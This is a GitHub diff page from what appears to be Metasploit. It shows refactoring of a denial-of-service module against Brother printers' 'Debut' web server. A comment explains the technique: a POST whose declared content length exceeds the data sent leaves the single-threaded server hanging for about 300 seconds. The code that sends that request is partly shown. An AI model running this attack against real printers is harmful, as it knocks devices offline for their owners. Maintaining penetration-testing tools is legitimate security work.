You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: modules/auxiliary/dos/http/brother_debut_dos.rb
+21-20Lines changed: 21 additions & 20 deletions
Original file line number
Diff line number
Diff line change
@@ -31,26 +31,23 @@ def initialize(info = {})
31
31
32
32
defis_alive?
33
33
res=send_request_raw({
34
-
'method'=>'GET',
35
-
'uri'=>'/',
34
+
'method'=>'GET',
35
+
'uri'=>'/',
36
36
},10)
37
37
38
38
return !res.nil?
39
39
end
40
40
41
-
defrun
42
-
41
+
defdos
42
+
# The web server is single threaded, and when the content length is longer than the data, it will continue to wait
43
+
# for the rest of the data, which never comes, and times out after ~300 seconds.
43
44
begin
44
-
time=Time.new
45
-
print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}. Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
46
-
# The web server is single threaded, and when the content length is longer than the data, it will continue to wait
47
-
# for the rest of the data, which never comes, and times out after ~300 seconds.
48
45
data=Rex::Text.rand_text_alphanumeric(40)
49
46
send_request_cgi({
50
-
'method'=>'POST',
51
-
'uri'=>'/',
52
-
'data'=>data,#'asdasdasdasdasdasdasd',
53
-
'headers'=>{
47
+
'method'=>'POST',
48
+
'uri'=>'/',
49
+
'data'=>data,#'asdasdasdasdasdasdasd',
50
+
'headers'=>{
54
51
# These are kept here since they were in the original exploit, however they are not required
0 commit comments